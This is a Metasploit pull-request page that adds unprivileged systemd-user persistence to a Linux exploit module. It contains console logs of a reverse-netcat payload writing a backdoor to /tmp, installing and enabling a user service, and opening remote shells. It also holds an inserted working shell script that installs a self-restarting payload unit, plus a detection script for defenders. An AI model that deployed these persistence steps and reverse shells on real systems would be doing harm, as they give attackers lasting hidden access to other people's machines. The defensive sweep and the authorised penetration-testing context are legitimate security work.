
Add systemd unprivileged user persistence #11419

Merged
merged 10 commits into from Mar 6, 2019

5 participants
@terrorbyte (Contributor) commented Feb 15, 2019

These changes add a new target to the Linux service persistence for "systemd user", which (if supported) will invoke systemctl --user, which allows non-administrative users to run service files.

At the moment I only implemented the functionality to match the original systemd persistence features, but realistically it is possible to enforce different mechanisms for things like user logins, logouts, and a pile more as documented in systemd.unit(5). I have a small write-up from ages ago that has some more sophisticated examples.

A couple of things I noticed should be noted: SHELLPATH should probably change when the target is selected, as the default is expecting an administrative user with access to /usr/local/bin. Additionally, the behavior of enabling a service without any option to disable it freaked me out a bit, so I added that as an advanced option.

msf5 exploit(linux/local/service_persistence) > show options

Module options (exploit/linux/local/service_persistence):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SERVICE                      no        Name of service to create
   SESSION     1                yes       The session to run this module on.
   SHELLPATH   /tmp             yes       Writable path to put our shell
   SHELL_NAME                   no        Name of shell file to write


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT  4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   systemd user


msf5 exploit(linux/local/service_persistence) > run

[!] SESSION may not be compatible with this module.
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4445
[*] Command shell session 2 opened (127.0.0.1:4445 -> 127.0.0.1:54344) at 2019-02-15 15:45:16 -0500

id
uid=1000(cblack) gid=1000(cblack) groups=1000(cblack),27(sudo),117(postgres)
exit
[*] 127.0.0.1 - Command shell session 2 closed.
msf5 exploit(linux/local/service_persistence) > set VERBOSE true
VERBOSE => true
msf5 exploit(linux/local/service_persistence) > run

[!] SESSION may not be compatible with this module.
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4445
[*] Writing backdoor to /tmp/iEucd
[*] Writing service: /home/cblack/.config/systemd/user/uKxHqmV.service
[*] Reloading manager configuration
[*] Enabling service
[*] Starting service: uKxHqmV
[*] Command shell session 3 opened (127.0.0.1:4445 -> 127.0.0.1:54358) at 2019-02-15 15:45:30 -0500

echo hi lennart
hi lennart
exit
[*] 127.0.0.1 - Command shell session 3 closed.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Execute a meterpreter shell on your Linux target and get a session
  • use linux/local/service_persistence
  • set SESSION 1
  • set TARGET 4 - for systemd user targets
  • set SHELLPATH /tmp - The rest of the targets expect an administratively writable directory
  • use PAYLOAD cmd/unix/reverse_netcat
  • set appropriate LHOST and LPORT
  • (optionally) set ENABLE false
  • execute
Added systemd lower privilege service persistence
Update the module to support systemd --user as a target for the
service_persistence module. This creates a file in a set of "supported"
local directories and triggers the systemctl calls with --user. The unit
files in question can be seen documented in systemd.unit(5)
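The steps behind target 4 ("systemd user"), written out as a plain POSIX shell script so the mechanics are visible outside msfconsole. This is an added example for this page, not the module's code, and the unit text and function names (persist_unit_text, user_unit_dir, persist_install, persist_remove) are assumptions rather than the module's exact output. It covers the two points raised in the PR description: the per-user unit directory may not exist yet, and enabling is a separate step from starting, so it can be left out.

```shell
#!/bin/sh
# Added example for this page, not the Metasploit module's code: the steps behind
# target 4 ("systemd user") as a plain POSIX shell script. Function names and the
# unit text are assumptions, not the module's exact output.

# Render a user unit that (re)starts the payload whenever it exits.
# $1 = unit description, $2 = absolute path of the payload.
# WantedBy=default.target is the user manager's equivalent of multi-user.target;
# a user unit that wants multi-user.target is never pulled in by systemd --user.
persist_unit_text() {
    printf '[Unit]\nDescription=%s\n\n' "$1"
    printf '[Service]\nExecStart=%s\nRestart=always\nRestartSec=10\n\n' "$2"
    printf '[Install]\nWantedBy=default.target\n'
}

# Per-user unit directory searched by systemd --user (see systemd.unit(5)).
user_unit_dir() {
    printf '%s/systemd/user\n' "${XDG_CONFIG_HOME:-$HOME/.config}"
}

# Install the unit and start it; enable it only when $3 is "true" (the role of the
# module's ENABLE option). Needs a running user manager, i.e. XDG_RUNTIME_DIR and
# DBUS_SESSION_BUS_ADDRESS set for this user, which a bare reverse shell may lack.
# $1 = unit name without .service, $2 = payload path, $3 = true|false
persist_install() {
    dir=$(user_unit_dir)
    mkdir -p "$dir"                                  # often absent on a fresh account
    persist_unit_text "$1" "$2" > "$dir/$1.service"
    systemctl --user daemon-reload
    if [ "$3" = true ]; then
        systemctl --user enable "$1.service"         # symlink in default.target.wants/
    fi
    systemctl --user start "$1.service"
}

# Undo everything persist_install did.
persist_remove() {
    dir=$(user_unit_dir)
    systemctl --user stop "$1.service" 2>/dev/null || true
    systemctl --user disable "$1.service" 2>/dev/null || true
    rm -f "$dir/$1.service"
    systemctl --user daemon-reload
}

# Usage (run interactively as the target user, not at source time):
#   persist_install uKxHqmV /tmp/iEucd true
#   persist_remove  uKxHqmV
```

The unit writes its payload path into ExecStart, so SHELLPATH has to be somewhere the unprivileged user can write and execute from; /tmp works for a demo but is also the first place a defender looks, and a noexec mount on /tmp breaks it outright.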
@terrorbyte (Contributor, Author) commented Feb 15, 2019

Some other notes:

  • It should be documented that ENABLE'd user services will actually execute on each user login as opposed to system reboot. This logic can actually be flipped to execute when users log out, and if this PR makes it I'll add that in a bit later
  • I do believe that I may have forgotten the part of my patch to check if the systemd user directories actually exist; if a test fails on that case I will add some mkdir logic (realistically I think that this should be part of the core library and have been working on adding it)
  • This is my first PR (despite working at R7 lol: @cblack-r7 ) so if I did something stupid just tell me.
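The defender's view of the same mechanism, as an added example that is not part of the PR: a sweep for user-level systemd persistence of the kind this target installs. The helper names (unit_execstart, audit_user_units, enabled_user_units, hunt_all_homes) are assumptions; the directories searched are the per-user unit paths from systemd.unit(5), and the "suspicious" rule is simply an ExecStart that runs something out of a world-writable staging area.

```shell
#!/bin/sh
# Added example for this page, not part of the PR: find user-level systemd
# persistence of the kind target 4 installs. Function names are assumptions.

# Value of the first ExecStart= line in a unit file, with systemd's
# "-", "@", ":", "+" and "!" prefix characters stripped.
unit_execstart() {
    sed -n 's/^ExecStart=[-@:+!]*//p' "$1" | head -n 1
}

# Report every *.service under the given directories whose ExecStart runs
# something from a world-writable staging area. Output: "<unit path>\t<command>".
audit_user_units() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        for unit in "$dir"/*.service; do
            [ -f "$unit" ] || continue
            cmd=$(unit_execstart "$unit")
            case "$cmd" in
                /tmp/*|/var/tmp/*|/dev/shm/*)
                    printf '%s\t%s\n' "$unit" "$cmd" ;;
            esac
        done
    done
}

# Units that start when the user's manager starts: the symlinks that
# "systemctl --user enable" drops under default.target.wants/ (the module's ENABLE).
enabled_user_units() {
    for link in "$1"/default.target.wants/*.service; do
        if [ -L "$link" ]; then
            basename "$link"
        fi
    done
}

# Sweep every home directory on the box (both per-user search paths), then list
# lingering users: their manager starts at boot, so their enabled units survive a
# reboot without anyone logging in.
hunt_all_homes() {
    for home in /home/* /root; do
        for dir in "$home/.config/systemd/user" "$home/.local/share/systemd/user"; do
            audit_user_units "$dir"
            enabled_user_units "$dir"
        done
    done
    ls /var/lib/systemd/linger 2>/dev/null || true
}
```

This is also where the "login, not reboot" note above comes from: a user unit enabled this way only starts when that user's systemd --user instance starts, which on a default install is the user's first login session. If lingering is on for the account (loginctl enable-linger, recorded as a file under /var/lib/systemd/linger), the user manager is started at boot instead, so checking that directory tells you which of these units will come back after a reboot on their own.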

@wvu-r7 wvu-r7 self-assigned this Feb 19, 2019

terrorbyte added some commits Feb 20, 2019

@bcoles bcoles added the delayed label Feb 26, 2019

@bcoles bcoles removed the delayed label Mar 1, 2019

@bcoles (Contributor) commented Mar 1, 2019

Please add some module documentation for this module.

Here's a skeleton.

## Description

  This module will create a service on the box, and mark it for auto-restart.
  We need enough access to write service files and potentially restart services.


## Vulnerable Application

  Targets:
    System V:
      CentOS <= 5
      Debian <= 6
      Kali 2.0
      Ubuntu <= 9.04
    Upstart:
      CentOS 6
      Fedora >= 9, < 15
      Ubuntu >= 9.10, <= 14.10
    systemd:
      CentOS 7
      Debian >= 7, <=8
      Fedora >= 15
      Ubuntu >= 15.04

  Note: System V won't restart the service if it dies, only an init change (reboot etc) will restart it.


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. Do: `use exploit/linux/local/service_persistence`
  4. Do: `set SESSION [SESSION]`
  5. Do: `check`
  6. Do: `run`
  7. You should get a new session


## Options

**SHELLPATH**

Writable path to put our shell (default: `/usr/local/bin`)

**SHELL_NAME**

Name of shell file to write.

**SERVICE**

Name of service to create.


## Scenarios

### systemd unprivileged user persistence

<your msf console output>
@wvu-r7 (Contributor) commented Mar 6, 2019

I am working on this now that I've cleared Wemo and Drupal.

@wvu-r7 (Contributor) commented Mar 6, 2019

msf5 exploit(linux/local/service_persistence) > options

Module options (exploit/linux/local/service_persistence):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SERVICE                      no        Name of service to create
   SESSION     -1               yes       The session to run this module on.
   SHELLPATH   /tmp             yes       Writable path to put our shell
   SHELL_NAME                   no        Name of shell file to write


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.28.128.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   systemd user


msf5 exploit(linux/local/service_persistence) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Writing backdoor to /tmp/PPpCF
[*] Max line length is 65537
[*] Writing 94 bytes in 1 chunks of 330 bytes (octal-encoded), using printf
[*] Creating user service directory
[*] Writing service: /home/vagrant/.config/systemd/user/OzzdRBC.service
[*] Max line length is 65537
[*] Writing 203 bytes in 1 chunks of 778 bytes (octal-encoded), using printf
[*] Reloading manager configuration
[*] Enabling service
[*] Starting service: OzzdRBC
[*] Command shell session 2 opened (172.28.128.1:4444 -> 172.28.128.3:52564) at 2019-03-06 00:22:40 -0600

id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

@wvu-r7 wvu-r7 added enhancement and removed needs-docs labels Mar 6, 2019

wvu-r7 added some commits Mar 6, 2019

@wvu-r7 wvu-r7 merged commit ebb80ae into rapid7:master Mar 6, 2019

3 checks passed:

  • Metasploit Automation - Sanity Test Execution: successfully completed all tests
  • Metasploit Automation - Test Execution: successfully completed all tests
  • continuous-integration/travis-ci/pr: the Travis CI build passed

wvu-r7 added a commit that referenced this pull request Mar 6, 2019

@wvu-r7 (Contributor) commented Mar 6, 2019

Release Notes

This adds systemd user-level service persistence to the linux/local/service_persistence exploit module.

msjenkins-r7 added a commit that referenced this pull request Mar 6, 2019
